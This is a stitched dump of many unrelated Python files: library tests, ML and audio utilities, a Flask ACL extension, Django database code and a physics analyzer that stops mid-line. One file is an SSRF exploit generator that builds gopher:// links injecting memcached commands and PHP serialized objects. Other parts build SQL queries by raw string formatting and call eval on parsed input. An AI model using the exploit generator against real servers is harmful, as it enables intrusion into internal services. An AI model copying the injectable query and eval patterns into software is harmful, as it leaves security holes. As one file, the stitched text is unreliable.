def test_eval_apply(self): assert list(self.jit_1.eval_apply(torch.tensor([1])))[0] == torch.tensor([2]) assert list(self.compose_1.eval_apply(torch.tensor([0])))[0] == torch.tensor([2]) def test_device(self): self.jit_1.pd_to('cpu') device = next(self.jit_1.pd_layers[0].parameters()).device.type assert device == 'cpu' def test_pd_layers(self): assert len(self.jit_1.pd_layers) > 0 def test_pd_parameters(self): assert len(list(self.jit_1.pd_parameters())) == 2 def test_save_and_load(self, tmp_path, ignore_padl_requirement): self.jit_1.pd_save(tmp_path / 'test.padl') t1 = pd.load(tmp_path / 'test.padl') assert t1.infer_apply(torch.tensor(1)) == torch.tensor(2) self.compose_1.pd_save(tmp_path / 'test.padl', True) compose_1 = pd.load(tmp_path / 'test.padl') assert compose_1.infer_apply(torch.tensor(0)) == torch.tensor(2) def test_methods(self): diff = set(dir(pd.TorchModuleTransform)) - set(dir(self.jit_1)) assert len(diff) == 0 class TestClassInstance: @pytest.fixture(autouse=True, scope='class') def init(self, request): request.cls.transform_1 = transform(SimpleClass(1)) request.cls.transform_2 = transform(PolynomialClass(1, 2)) def test_wrap(self): assert isinstance(self.transform_1, SimpleClass) assert isinstance(self.transform_1, pd.Transform) assert isinstance(self.transform_2, PolynomialClass) assert isinstance(self.transform_2, pd.Transform) def test_infer_apply(self): assert self.transform_1.infer_apply(1) == 2 assert self.transform_2.infer_apply(1) == 2 def test_eval_apply(self): assert list(self.transform_1.eval_apply([1])) == [2] assert list(self.transform_2.eval_apply([2])) == [6] def test_train_apply(self): assert list(self.transform_1.train_apply([1])) == [2] assert list(self.transform_2.train_apply([2])) == [6] def test_print(self): assert str(self.transform_1) assert str(self.transform_2) def test_pd_layers(self): assert len(self.transform_2.pd_layers) > 0 def test_pd_parameters(self): params = list(self.transform_2.pd_parameters()) assert len(params) == 2 def test_save_and_load(self, tmp_path, ignore_padl_requirement): self.transform_1.pd_save(tmp_path / 'test.padl') t1 = pd.load(tmp_path / 'test.padl') assert t1.infer_apply(1) == 2 self.transform_2.pd_save(tmp_path / 'test.padl', True) t2 = pd.load(tmp_path / 'test.padl') assert t2.infer_apply(1) == 2 def test_long_list(self): import tests.material.long_list class TestComposeWithComments: def test_lambda_1(self): # should not fail t = ( transform(lambda x: x) # >> transform(lambda x: x) ) def test_lambda_2(self): # should not fail t = ( transform(lambda x: x) # >> transform(lambda x: x) ) def test_identity(self): # should not fail t = ( Identity() # >> transform(lambda x: x) ) def test_function_1(self, tmp_path, ignore_padl_requirement): t = ( Identity() # >> transform(simple_func) ) t.pd_save(tmp_path) def test_function_2(self, tmp_path, ignore_padl_requirement): t = ( Identity() # >> transform(simple_func) ) t.pd_save(tmp_path) class TestAssertNoDoubleBatch: def test_double_1(self): with pytest.raises(AssertionError): t = plus_one >> batch >> batch t.pd_forward def test_double_2(self): with pytest.raises(AssertionError): t = plus_one >> plus_one + batch >> plus_one >> batch >> plus_one t.pd_forward def test_double_3(self): with pytest.raises(AssertionError): t = plus_one >> plus_one + batch >> plus_one >> batch + plus_one >> plus_one t.pd_forward def test_double_4(self): with pytest.raises(AssertionError): t = plus_one >> plus_one / batch >> batch + plus_one >> plus_one t.pd_forward def test_no_double(self): t = plus_one >> plus_one / batch >> batch / plus_one >> plus_one t.pd_forward class TestTrace: @pytest.fixture(autouse=True, scope='class') def init(self, request): emb = transform(torch.nn.Embedding)(10, 8) linear = transform(torch.nn.Linear)(4, 4) to_tensor = transform(lambda x: torch.LongTensor(x)) request.cls.pipeline = to_tensor >> batch >> emb >> linear def test_pd_trace(self): try: list(self.pipeline.train_apply([[9, 8, 8], [4, 4, 4], [5, 5, 5], [6, 6, 6]], batch_size=2, num_workers=0)) except: from padl.transforms import _pd_trace assert len(_pd_trace) == 3 assert _pd_trace[0].error_position == 0 assert torch.equal(_pd_trace[1].args, torch.LongTensor([[9, 8, 8], [4, 4, 4]])) assert _pd_trace[1].error_position == 1 assert _pd_trace[1].pd_mode == 'train' assert _pd_trace[2].args == [[9, 8, 8], [4, 4, 4]] def test_identity_compose_saves(tmp_path, ignore_padl_requirement): t = padl.identity >> padl.identity t.pd_save(tmp_path / 'test') class TestParam: def test_param_works(self, tmp_path, ignore_padl_requirement): x = padl.param(1, 'x') t = SimpleClassTransform(x) assert t(1) == 2 t.pd_save(tmp_path / 'test.padl') t_1 = padl.load(tmp_path / 'test.padl') assert t_1(1) == 2 t_2 = padl.load(tmp_path / 'test.padl', x=2) assert t_2(1) == 3 def test_no_default(self, tmp_path, ignore_padl_requirement): x = padl.param(1, 'x', use_default=False) t = SimpleClassTransform(x) assert t(1) == 2 t.pd_save(tmp_path / 'test.padl') with pytest.raises(ValueError): padl.load(tmp_path / 'test.padl') t_2 = padl.load(tmp_path / 'test.padl', x=2) assert t_2(1) == 3 def test_wrong_param(self, tmp_path, ignore_padl_requirement): x = padl.param(1, 'x') t = SimpleClassTransform(x) assert t(1) == 2 t.pd_save(tmp_path / 'test.padl') with pytest.raises(ValueError): padl.load(tmp_path / 'test.padl', y=1) t_2 = padl.load(tmp_path / 'test.padl', x=2) assert t_2(1) == 3 def test_device_check_in_init_works(): from tests.material.transforms_in_module import DeviceCheckInInit t = SimpleClassTransform(1) DeviceCheckInInit(t >> t >> batch >> t) # should not cause an error def test_failing_save_doesnt_overwrite(tmp_path, ignore_padl_requirement): @transform def f(x): ... pd.save(f, tmp_path) @transform class X: def pre_save(self, *args, **kwargs): # this will crash saving 1 / 0 with pytest.raises(ZeroDivisionError): pd.save(X(), tmp_path, force_overwrite=True) # doesn't work assert load(str(tmp_path) + '.padl')._pd_call == 'f' # location still contains f def test_successful_save_overwrites(tmp_path, ignore_padl_requirement): @transform def f(x): ... pd.save(f, tmp_path) @transform class X: ... pd.save(X(), tmp_path, force_overwrite=True) # works assert load(str(tmp_path) + '.padl')._pd_call == 'X()' # location contains X def test_missing_package(tmp_path): with pytest.raises(RequirementNotFound) as excinfo: plus_one.pd_save(tmp_path / 'test.padl') assert excinfo.value.package == 'padl' assert str(excinfo.value) == ('Could not find an installed version of "padl", which this ' 'Transform depends on. Run with *strict_requirements=False* ' 'to ignore.')
438568
from .model import GLAM __all__ = ['GLAM'] # from .simulation import * # from .utils import * # from .components import * # from .fit import *
438592
import apps.common.func.InitDjango from apps.common.func.CommonFunc import * from all_models.models import TbBusinessLine class BusinessService(object): @staticmethod def getBusiness(): return dbModelListToListDict(TbBusinessLine.objects.all()) @staticmethod def getInterfaceListBusinessId(interfaceListSql,protocol="HTTP"): if protocol == "HTTP": sql = 'SELECT distinct bussinessLineName from (SELECT businessLineId from tb_http_interface WHERE %s) b LEFT JOIN tb_business_line bl on bl.id = b.businessLineId ' % interfaceListSql result = executeSqlGetDict(sql,[]) return result elif protocol == "DUBBO": sql = 'SELECT distinct bussinessLineName from (SELECT businessLineId from tb2_dubbo_interface WHERE %s) b LEFT JOIN tb_business_line bl on bl.id = b.businessLineId ' % interfaceListSql result = executeSqlGetDict(sql, []) return result @staticmethod def getVersionInterfaceListBusinessId(interfaceListSql,versionName): sql = 'SELECT distinct bussinessLineName from (SELECT businessLineId from tb_version_http_interface WHERE versionName="%s" and ( %s)) b LEFT JOIN tb_business_line bl on bl.id = b.businessLineId ' % (versionName,interfaceListSql) result = executeSqlGetDict(sql,[]) return result @staticmethod def getTestCaseListBusinessId(testCaseListSql,protocol="HTTP"): if protocol=="HTTP": sql = "SELECT distinct bussinessLineName from (SELECT businessLineId from tb_http_testcase WHERE %s) b LEFT JOIN tb_business_line bl on bl.id = b.businessLineId " % testCaseListSql result = executeSqlGetDict(sql,[]) return result elif protocol=="DUBBO": sql = "SELECT distinct bussinessLineName from (SELECT businessLineId from tb2_dubbo_testcase WHERE %s) b LEFT JOIN tb_business_line bl on bl.id = b.businessLineId " % testCaseListSql result = executeSqlGetDict(sql, []) return result @staticmethod def getVersionTestCaseListBusinessId(testCaseListSql,versionName): sql = "SELECT distinct bussinessLineName from (SELECT businessLineId from tb_version_http_testcase WHERE versionName='%s' and (%s) ) b LEFT JOIN tb_business_line bl on bl.id = b.businessLineId " % (versionName,testCaseListSql) result = executeSqlGetDict(sql,[]) return result @staticmethod def getAllBusinessLine(): return TbBusinessLine.objects.filter(state=1) @staticmethod def getBusinessLineNameById(id): return TbBusinessLine.objects.filter(id=id)[0].bussinessLineName if __name__ == "__main__": # print((businessService.=))) # print(UserService.getUserByLoginname(UserService.getUsers()[0].loginname)) print(dbModelListToListDict(BusinessService.getBusiness()))
438596
import os import torch import torch.nn as nn import torch.nn.functional as F import torchaudio import torchaudio.functional as AF import librosa import math import sys import numpy as np import time from conf.feature import * from conf.inference import * def align(a, b, dim): return a.transpose(0, dim)[:b.shape[dim]].transpose(0, dim) def get_fft_window(): fft_window = librosa.filters.get_window(WINDOW, WINDOW_SIZE, fftbins=True) fft_window = librosa.util.pad_center(fft_window, N_FFT) return torch.from_numpy(fft_window) FFT_WINDOW = get_fft_window() def onehot_tensor(x, dim=0, classes_num=NOTES_NUM): x = x.unsqueeze(dim) shape = list(x.shape) shape[dim] = classes_num y = torch.zeros(shape).to(x.device).scatter_(dim, x, 1) return y def spec2wav(x, cos, sin, wav_len, syn_phase=0, device="cuda"): #''' # args : channels * frames * n_fft #''' x = F.pad(x, (0, 1), "constant", 0) fft_window = FFT_WINDOW.cuda() if device == "cuda" else FFT_WINDOW if syn_phase == 1: print("here") wav_len = int((x.shape[-2] - 1)/ FRAMES_PER_SEC * SAMPLE_RATE) wav = AF.griffinlim(x.transpose(1, 2), window=fft_window, n_fft=N_FFT, hop_length=HOP_SIZE, win_length=WINDOW_SIZE, power=1, normalized=False, length=wav_len, n_iter=N_ITER, momentum=0, rand_init=False) elif syn_phase == 2: itersNum = 100 for i in range(itersNum): spec = torch.stack([x * cos, x * sin], -1).transpose(1, 2) wav = torch.istft(spec, n_fft=N_FFT, hop_length=HOP_SIZE, win_length=WINDOW_SIZE, window=fft_window, center=True, normalized=False, onesided=None, length=wav_len, return_complex=False) if i < itersNum - 1: _, cos, sin = wav2spec(wav) elif syn_phase == 0: spec = torch.stack([x * cos, x * sin], -1).transpose(1, 2) wav = torch.istft(spec, n_fft=N_FFT, hop_length=HOP_SIZE, win_length=WINDOW_SIZE, window=fft_window, center=True, normalized=False, onesided=None, length=wav_len, return_complex=False) return wav def wav2spec(x, device="cuda"): ''' return channel * frames * n_fft ''' fft_window = FFT_WINDOW.cuda() if device == "cuda" else FFT_WINDOW spec = torch.stft(x, N_FFT, hop_length=HOP_SIZE, win_length=WINDOW_SIZE, window=fft_window, center=True, pad_mode='reflect', normalized=False, onesided=None, return_complex=False) spec = spec.transpose(1, 2) real = spec[:, :, :, 0] imag = spec[:, :, :, 1] mag = (real ** 2 + imag ** 2) ** 0.5 cos = real / torch.clamp(mag, 1e-10, np.inf) sin = imag / torch.clamp(mag, 1e-10, np.inf) return mag[:, :, :-1], cos, sin def save_audio(wav, path): torchaudio.save(path, wav.float().cpu(), SAMPLE_RATE) def devide_into_batches(x, pad_value=0, overlap_edge=PAD_FRAME, duration_axis=-1): x = x.unsqueeze(0).unsqueeze(-1) duration_axis = duration_axis - 1 if duration_axis < 0 else duration_axis + 1 x = x.transpose(duration_axis, -1) frames_num = x.shape[-1] batch_frames_num_non_padding = BATCH_FRAMES_NUM - overlap_edge * 2 segments_num = frames_num // batch_frames_num_non_padding if pad_value == -1: x = x[ :segments_num * batch_frames_num_non_padding] elif segments_num * batch_frames_num_non_padding < frames_num: x = F.pad(x, (0, int((segments_num + 1) * batch_frames_num_non_padding) - frames_num), 'constant', value=pad_value) segments_num += 1 x = F.pad(x, (overlap_edge, overlap_edge), 'constant', value=pad_value) x = x.transpose(-1, 0) samples = [] for i in range(segments_num): st = i * batch_frames_num_non_padding ed = st + BATCH_FRAMES_NUM sample = x[st : ed].transpose(0, duration_axis).squeeze(0).squeeze(-1) samples.append(sample) batches = [] samples_num = len(samples) batches_num = (samples_num + INFERENCE_BATCH_SIZE - 1) // INFERENCE_BATCH_SIZE for i in range(batches_num): st = i * INFERENCE_BATCH_SIZE ed = st + INFERENCE_BATCH_SIZE ed = samples_num if ed > samples_num else ed batches.append(torch.stack(samples[st : ed], 0)) return batches def merge_batches(x, overlap_edge=PAD_FRAME, duration_axis=-1): if duration_axis >= 0: duration_axis += 1 x = x.unsqueeze(0).transpose(0, duration_axis) if duration_axis >= 0: duration_axis -= 1 x = x[overlap_edge : -overlap_edge].transpose(0, 1).flatten(0, 1).transpose(0, duration_axis).squeeze(0) return x def merge_from_list(x, index=0): results = [] for unit in x: if type(unit) in [tuple, list]: results.append(unit[index]) else: results.append(unit) return torch.cat(results, 0)
438604
import torch import json import numpy as np from transformers import (BertForMaskedLM, BertTokenizer) modelpath = 'bert-large-uncased-whole-word-masking/' tokenizer = BertTokenizer.from_pretrained(modelpath) model = BertForMaskedLM.from_pretrained(modelpath) model.eval() id_of_mask = 103 def get_embeddings(sentence): with torch.no_grad(): processed_sentence = '' + sentence + '' tokenized = tokenizer.encode(processed_sentence) input_ids = torch.tensor(tokenized).unsqueeze(0) # Batch size 1 outputs = model(input_ids) index_of_mask = tokenized.index(id_of_mask) # batch, tokens, vocab_size prediction_scores = outputs[0] return prediction_scores[0][index_of_mask].cpu().numpy().tolist() def get_embedding_group(tokens): print(tokens) mutated = [] for i, v in enumerate(tokens): array = tokens.copy() array[i] = id_of_mask mutated.append(array) print('Running model') output = model(torch.tensor(mutated))[0] print('Converting to list') array = output.detach().numpy().tolist() print('Constructing out array') # only grab mask embedding # can probaby do this in torch? not sure how out = [] for i, v in enumerate(array): out.append(v[i]) return out def get_embedding_group_top(tokens): sents = get_embedding_group(tokens) out = [] print('get_embedding_group done') for sent_i, sent in enumerate(sents): all_tokens = [] for i, v in enumerate(sent): all_tokens.append({'i': i, 'v': float(v)}) all_tokens.sort(key=lambda d: d['v'], reverse=True) topTokens = all_tokens[:90] sum = np.sum(np.exp(sent)) for i, token in enumerate(topTokens): token['p'] = float(np.exp(token['v'])/sum) out.append(all_tokens[:90]) return out # Runs one token at a time to stay under memory limit def get_embedding_group_low_mem(tokens): print(tokens) out = [] for index_of_mask, v in enumerate(tokens): array = tokens.copy() array[index_of_mask] = id_of_mask input_ids = torch.tensor(array).unsqueeze(0) prediction_scores = model(input_ids)[0] out.append(prediction_scores[0][index_of_mask].detach().numpy()) return out def get_embedding_group_top_low_mem(tokens): sents = get_embedding_group_low_mem(tokens) out = [] print('get_embedding_group done') for sent_i, sent in enumerate(sents): all_tokens = [] for i, v in enumerate(sent): all_tokens.append({'i': i, 'v': float(v)}) all_tokens.sort(key=lambda d: d['v'], reverse=True) topTokens = all_tokens[:90] sum = np.sum(np.exp(sent)) for i, token in enumerate(topTokens): token['p'] = float(np.exp(token['v'])/sum) out.append(all_tokens[:90]) return out import os import shutil # Free up memory if os.environ.get('REMOVE_WEIGHTS') == 'TRUE': print('removing bert-large-uncased-whole-word-masking from filesystem') shutil.rmtree('bert-large-uncased-whole-word-masking', ignore_errors=True)
438613
from __future__ import absolute_import import functools import logging from pprint import pformat from urllib import urlencode import flask from flask import request, current_app from flask_login import current_user import werkzeug as wz from flask_acl.core import iter_object_acl, get_object_context, check from flask_acl.permission import default_permission_sets from flask_acl.predicate import default_predicates log = logging.getLogger(__name__) class _Redirect(Exception): pass class ACLManager(object): """Flask extension for registration and checking of ACLs on routes and other objects.""" login_view = 'login' def __init__(self, app=None): self.context_processors = [] self.predicates = default_predicates.copy() self.predicate_parsers = [] self.permission_sets = default_permission_sets.copy() self.permission_set_parsers = [] if app: self.init_app(app) def init_app(self, app): app.acl_manager = self app.extensions['acl'] = self app.config.setdefault('ACL_ROUTE_DEFAULT_STATE', True) # I suspect that Werkzeug has something for this already... app.errorhandler(_Redirect)(lambda r: flask.redirect(r.args[0])) def context_processor(self, func): """Register a function to build authorization contexts. The function is called with no arguments, and must return a dict of new context material. """ self.context_processors.append(func) def predicate_parser(self, func): """Define a new predicate parser. E.g.:: @authz.predicate_parser def parse_groups(pred): if pred.startswith('group:'): return Group(pred.split(':')[1]) """ self.predicate_parsers.append(func) def permission_set_parser(self, func): """Define a new permission set parser. E.g.:: @authz.permission_set_parser def parse_globs(pattern): if '*' in pattern: reobj = re.compile(fnmatch.translate(pattern)) return reobj.match """ self.permission_set_parser.append(func) def predicate(self, name, func=None): """Define a new predicate (directly, or as a decorator). E.g.:: @authz.predicate('ROOT') def is_root(user, **ctx): # return True of user is in group "wheel". """ if func is None: return functools.partial(self.predicate, name) self.predicates[name] = func return func def permission_set(self, name, func=None): """Define a new permission set (directly, or as a decorator). E.g.:: @authz.permission_set('HTTP') def is_http_perm(perm): return perm.startswith('http.') """ if func is None: return functools.partial(self.predicate, name) self.permission_sets[name] = func return func def route_acl(self, *acl, **options): """Decorator to attach an ACL to a route. E.g:: @app.route('/url/to/view') @authz.route_acl(''' ALLOW WHEEL ALL DENY ANY ALL ''') def my_admin_function(): pass """ def _route_acl(func): func.__acl__ = acl @functools.wraps(func) def wrapped(*args, **kwargs): permission = 'http.' + request.method.lower() local_opts = options.copy() local_opts.setdefault('default', current_app.config['ACL_ROUTE_DEFAULT_STATE']) self.assert_can(permission, func, **local_opts) return func(*args, **kwargs) return wrapped return _route_acl def can(self, permission, obj, **kwargs): """Check if we can do something with an object. :param permission: The permission to look for. :param obj: The object to check the ACL of. :param **kwargs: The context to pass to predicates. >>> auth.can('read', some_object) >>> auth.can('write', another_object, group=some_group) """ context = {'user': current_user} for func in self.context_processors: context.update(func()) context.update(get_object_context(obj)) context.update(kwargs) return check(permission, iter_object_acl(obj), **context) def assert_can(self, permission, obj, **kwargs): """Make sure we have a permission, or abort the request. :param permission: The permission to look for. :param obj: The object to check the ACL of. :param flash: The message to flask if denied (keyword only). :param stealth: Abort with a 404? (keyword only). :param **kwargs: The context to pass to predicates. """ flash_message = kwargs.pop('flash', None) stealth = kwargs.pop('stealth', False) default = kwargs.pop('default', None) res = self.can(permission, obj, **kwargs) res = default if res is None else res if not res: if flash_message and not stealth: flask.flash(flash_message, 'danger') if current_user.is_authenticated(): if flash_message is not False: flask.flash(flash_message or 'You are not permitted to "%s" this resource' % permission) flask.abort(403) elif not stealth and self.login_view: if flash_message is not False: flask.flash(flash_message or 'Please login for access.') raise _Redirect(flask.url_for(self.login_view) + '?' + urlencode(dict(next= flask.request.script_root + flask.request.path ))) else: flask.abort(404) def can_route(self, endpoint, method=None, **kwargs): """Make sure we can route to the given endpoint or url. This checks for `http.get` permission (or other methods) on the ACL of route functions, attached via the `ACL` decorator. :param endpoint: A URL or endpoint to check for permission to access. :param method: The HTTP method to check; defaults to `'GET'`. :param **kwargs: The context to pass to predicates. """ view = flask.current_app.view_functions.get(endpoint) if not view: endpoint, args = flask._request_ctx.top.match(endpoint) view = flask.current_app.view_functions.get(endpoint) if not view: return False return self.can('http.' + (method or 'GET').lower(), view, **kwargs)
438618
import urllib def PHPMemcached(): print "\033[01m" + "\nThis is usable when you know Class and Variable name used by user\n"+ "\033[0m" code = raw_input("\033[96m" +"Give serialization payload\nexample: O:5:\"Hello\":0:{} : "+ "\033[0m") if(not code): print "\033[93m" + "Plz give payload" + "\033[0m" exit() payload = "%0d%0aset SpyD3r 4 0 " + str(len(code)) + "%0d%0a" + code + "%0d%0a" finalpayload = urllib.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":") print "\033[93m" +"\nYour gopher link is ready to do SSRF : \n" + "\033[0m" print "\033[04m" + "gopher://127.0.0.1:11211/_" + finalpayload + "\033[0m" print "\033[93m" +"\nAfter everything done, you can delete memcached item by using this payload: \n"+ "\033[0m" print "\033[04m" + "gopher://127.0.0.1:11211/_%0d%0adelete%20SpyD3r%0d%0a"+ "\033[0m" print "\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m"
438654
import io, sys, os, csv from Bio import SeqIO from selftarget.oligo import loadPamLookup, loadOligosByBarcode, getFileForOligoIdx def closeFiles(fhandles): for id in fhandles: fhandles[id].close() def writeBatchToFile(read_by_file, output_dir): for (filedir, filename) in read_by_file: if not os.path.isdir(output_dir + '/' + filedir): os.mkdir(output_dir + '/' + filedir) mapfilename = filename[:-6] + '_mappings.txt' if mapfilename in os.listdir(output_dir + '/' + filedir): fout = io.open(output_dir + '/' + filedir + '/' + mapfilename, 'a') else: fout = io.open(output_dir + '/' + filedir + '/' + mapfilename, 'w') for line in read_by_file[(filedir, filename)]: fout.write(u'%s\n' % line) fout.close() if __name__ == '__main__': if len(sys.argv) != 2 and len(sys.argv) != 3: print('split_null_mappings.py <high_dir> <(opt)map_dir_ext>') else: highdir = sys.argv[1] map_dir_ext = sys.argv[2] if len(sys.argv) >= 3 else '' mapping_dir = '/mapping_files%s/' % map_dir_ext map_dir = '/mapped_reads%s/' % map_dir_ext if not os.path.isdir(highdir + '/' + map_dir): os.mkdir(highdir + '/' + map_dir) mapping_files = os.listdir(highdir + mapping_dir) total, assigned = 0,0 for mapfile in mapping_files: fastq_file = mapfile[:-13] + '.fastq' batch = 0 read_by_file = {} batch_size = 10000 f = io.open(highdir + mapping_dir + mapfile) rdr = csv.reader(f, delimiter='\t') for toks in rdr: if '@@@' in toks[0]: continue oligo_id = toks[1].split()[0] batch += 1 total += 1 if oligo_id == 'None': continue if ',' in oligo_id: continue # Ignore ambiguously mapped reads oligo_idx = eval(oligo_id[5:].split('_')[0]) filepath, filename = getFileForOligoIdx( oligo_idx ) if (filepath, filename) not in read_by_file: read_by_file[(filepath,filename)] = [] read_by_file[(filepath,filename)].append('\t'.join(toks)) assigned += 1 if batch >= batch_size: writeBatchToFile(read_by_file, highdir + map_dir) batch = 0 read_by_file = {} if batch > 0 : writeBatchToFile(read_by_file, highdir + map_dir) print('Total records:', total) print('Total assigned:', assigned)
438666
from __future__ import print_function from ._version import version as __version__ from time import strftime, localtime try: from time import monotonic except ImportError: from monotonic import monotonic from IPython.core.magics.execution import _format_time as format_delta def format_timestamp(struct_time): timestamp = strftime('%Y-%m-%d %H:%M:%S %z', struct_time) # add colon in %z (for datetime.fromisoformat, stackoverflow.com/q/44836581) return '{}:{}'.format(timestamp[:-2], timestamp[-2:]) class LineWatcher(object): """Class that implements a basic timer. Notes ----- * Register the `start` and `stop` methods with the IPython events API. """ __slots__ = ['start_time', 'timestamp'] def start(self): self.timestamp = localtime() self.start_time = monotonic() def stop(self): delta = monotonic() - self.start_time print( u'time: {} (started: {})'.format( format_delta(delta), format_timestamp(self.timestamp), ) ) timer = LineWatcher() start = timer.start stop = timer.stop def load_ipython_extension(ip): start() ip.events.register('pre_run_cell', start) ip.events.register('post_run_cell', stop) def unload_ipython_extension(ip): ip.events.unregister('pre_run_cell', start) ip.events.unregister('post_run_cell', stop)
438667
from django.conf import settings from django.db import migrations from corehq.sql_db.config import plproxy_standby_config from corehq.sql_db.management.commands.configure_pl_proxy_cluster import ( get_drop_server_sql, get_sql_to_create_pl_proxy_cluster, ) from corehq.sql_db.operations import RawSQLMigration from corehq.util.django_migrations import noop_migration migrator = RawSQLMigration(('corehq', 'sql_proxy_standby_accessors', 'sql_templates'), { 'PL_PROXY_CLUSTER_NAME': settings.PL_PROXY_CLUSTER_NAME }) def create_update_pl_proxy_config(): if not plproxy_standby_config or not (settings.UNIT_TESTING and settings.USE_PARTITIONED_DATABASE): return noop_migration() sql_statements = get_sql_to_create_pl_proxy_cluster(plproxy_standby_config) drop_server_sql = get_drop_server_sql(plproxy_standby_config.cluster_name) return migrations.RunSQL('\n'.join(sql_statements), drop_server_sql) class Migration(migrations.Migration): dependencies = [ ] operations = [ migrations.RunSQL( 'CREATE EXTENSION IF NOT EXISTS plproxy', 'DROP EXTENSION plproxy' ), migrations.RunSQL( 'CREATE EXTENSION IF NOT EXISTS hashlib', 'DROP EXTENSION hashlib' ), create_update_pl_proxy_config(), migrator.get_migration('get_replication_delay.sql'), ]
438740
from django.apps import AppConfig class AppConfig(AppConfig): pass class CustomAppConfig(AppConfig): """ This class may be use to setup configuration for scalable components and tools """ name = 'custom'
438752
import argparse from pathlib import Path from typing import Dict import pandas as pd import torch import torch.distributed as dist import torch.nn.parallel import torch.utils.data import torch.utils.data.distributed import yaml from albumentations.core.serialization import from_dict from iglovikov_helper_functions.config_parsing.utils import object_from_dict from torch.utils.data.distributed import DistributedSampler from tqdm import tqdm from facemask_detection.dataloader import FaceMaskTestDataset from facemask_detection.utils import load_checkpoint def get_args(): parser = argparse.ArgumentParser() arg = parser.add_argument arg("-i", "--input_path", type=Path, help="Path with images.", required=True) arg("-c", "--config_path", type=Path, help="Path to config.", required=True) arg("-o", "--output_path", type=Path, help="Path to save jsons.", required=True) arg("-b", "--batch_size", type=int, help="batch_size", default=2) arg("-j", "--num_workers", type=int, help="num_workers", default=12) arg("-w", "--weight_path", type=str, help="Path to weights.", required=True) arg("--world_size", default=-1, type=int, help="number of nodes for distributed training") arg("--local_rank", default=-1, type=int, help="node rank for distributed training") arg("--fp16", action="store_true", help="Use fp6") return parser.parse_args() def main(): args = get_args() torch.distributed.init_process_group(backend="nccl") with open(args.config_path) as f: hparams = yaml.load(f, Loader=yaml.SafeLoader) hparams.update({"json_path": args.output_path, "local_rank": args.local_rank, "fp16": args.fp16}) device = torch.device("cuda", args.local_rank) model = object_from_dict(hparams["model"]) model = model.to(device) if args.fp16: model = model.half() corrections: Dict[str, str] = {"model.": ""} checkpoint = load_checkpoint(file_path=args.weight_path, rename_in_layers=corrections) model.load_state_dict(checkpoint["state_dict"]) model = torch.nn.parallel.DistributedDataParallel( model, device_ids=[args.local_rank], output_device=args.local_rank ) file_paths = [] for regexp in ["*.jpg", "*.png", "*.jpeg", "*.JPG"]: file_paths += sorted(x for x in tqdm(args.input_path.rglob(regexp))) dataset = FaceMaskTestDataset(file_paths, transform=from_dict(hparams["test_aug"])) sampler = DistributedSampler(dataset, shuffle=False) dataloader = torch.utils.data.DataLoader( dataset, batch_size=args.batch_size, num_workers=args.num_workers, pin_memory=True, shuffle=sampler is None, drop_last=False, sampler=sampler, ) prediction = predict(dataloader, model, hparams, device) prediction_list = [torch.zeros_like(prediction) for _ in range(dist.get_world_size())] dist.all_gather(prediction_list, prediction) if dist.get_rank() == 0: with torch.no_grad(): predictions = torch.cat(prediction_list, dim=1).reshape(-1).cpu().numpy()[: len(dataset)] df = pd.DataFrame({"file_path": file_paths, "predictions": predictions}) df.to_csv(args.output_path, index=False) def predict(dataloader, model, hparams, device): model.eval() if hparams["local_rank"] == 0: loader = tqdm(dataloader) else: loader = dataloader result = [] with torch.no_grad(): for batch in loader: images = batch["image"] # images that are rescaled and padded if hparams["fp16"]: images = images.half() prediction = model(images.to(device)) result += [torch.sigmoid(prediction)] return torch.cat(result) if __name__ == "__main__": main()
438762
import operator import itertools import copy from math import * from ROOT import std from ROOT import TLorentzVector, TVector3, TVectorD from PhysicsTools.Heppy.analyzers.core.Analyzer import Analyzer from PhysicsTools.HeppyCore.framework.event import Event from PhysicsTools.HeppyCore.statistics.counter import Counter, Counters from PhysicsTools.Heppy.analyzers.core.AutoHandle import AutoHandle from PhysicsTools.HeppyCore.utils.deltar import deltaR from ROOT.heppy import Megajet from ROOT.heppy import ReclusterJets import ROOT import os class RazorAnalyzer( Analyzer ): def __init__(self, cfg_ana, cfg_comp, looperName ): super(RazorAnalyzer,self).__init__(cfg_ana,cfg_comp,looperName) def declareHandles(self): super(RazorAnalyzer, self).declareHandles() #genJets self.handles['genJets'] = AutoHandle( 'slimmedGenJets','std::vector<reco::GenJet>') def beginLoop(self, setup): super(RazorAnalyzer,self).beginLoop(setup) self.counters.addCounter('pairs') count = self.counters.counter('pairs') count.register('all events') def computeMR(self, ja, jb): A = ja.P(); B = jb.P(); az = ja.Pz(); bz = jb.Pz(); mr = sqrt((A+B)*(A+B)-(az+bz)*(az+bz)); return mr def computeMTR(self, ja, jb, met): mtr = met.Vect().Mag()*(ja.Pt()+jb.Pt()) - met.Vect().Dot(ja.Vect()+jb.Vect()); mtr = sqrt(mtr/2.); return mtr; def computeR(self, ja, jb, met): mr = self.computeMR(ja,jb) mtr = self.computeMTR(ja,jb,met) r = 999999. if mr <= 0 else mtr/mr return r def makeRAZOR(self, event): # print '==> INSIDE THE PRINT MT2' # print 'MET=',event.met.pt() import array import numpy ## ===> <NAME> (met, metphi) = event.met.pt(), event.met.phi() metp4 = ROOT.TLorentzVector() metp4.SetPtEtaPhiM(met,0,metphi,0) objects40jc = [ j for j in event.cleanJets if j.pt() > 40 and abs(j.eta())<2.5 ] #### get megajets (association method: default 1 = minimum sum of the invariant masses of the two megajets) if len(objects40jc)>=2: pxvec = ROOT.std.vector(float)() pyvec = ROOT.std.vector(float)() pzvec = ROOT.std.vector(float)() Evec = ROOT.std.vector(float)() grouping = ROOT.std.vector(int)() for jet in objects40jc: pxvec.push_back(jet.px()) pyvec.push_back(jet.py()) pzvec.push_back(jet.pz()) Evec.push_back(jet.energy()) megajet = Megajet(pxvec, pyvec, pzvec, Evec, 1) pseudoJet1px = megajet.getAxis1()[0] * megajet.getAxis1()[3] pseudoJet1py = megajet.getAxis1()[1] * megajet.getAxis1()[3] pseudoJet1pz = megajet.getAxis1()[2] * megajet.getAxis1()[3] pseudoJet1energy = megajet.getAxis1()[4] pseudoJet2px = megajet.getAxis2()[0] * megajet.getAxis2()[3] pseudoJet2py = megajet.getAxis2()[1] * megajet.getAxis2()[3] pseudoJet2pz = megajet.getAxis2()[2] * megajet.getAxis2()[3] pseudoJet2energy = megajet.getAxis2()[4] pseudoJet1pt2 = pseudoJet1px*pseudoJet1px + pseudoJet1py*pseudoJet1py pseudoJet2pt2 = pseudoJet2px*pseudoJet2px + pseudoJet2py*pseudoJet2py if pseudoJet1pt2 >= pseudoJet2pt2: event.pseudoJet1_had = 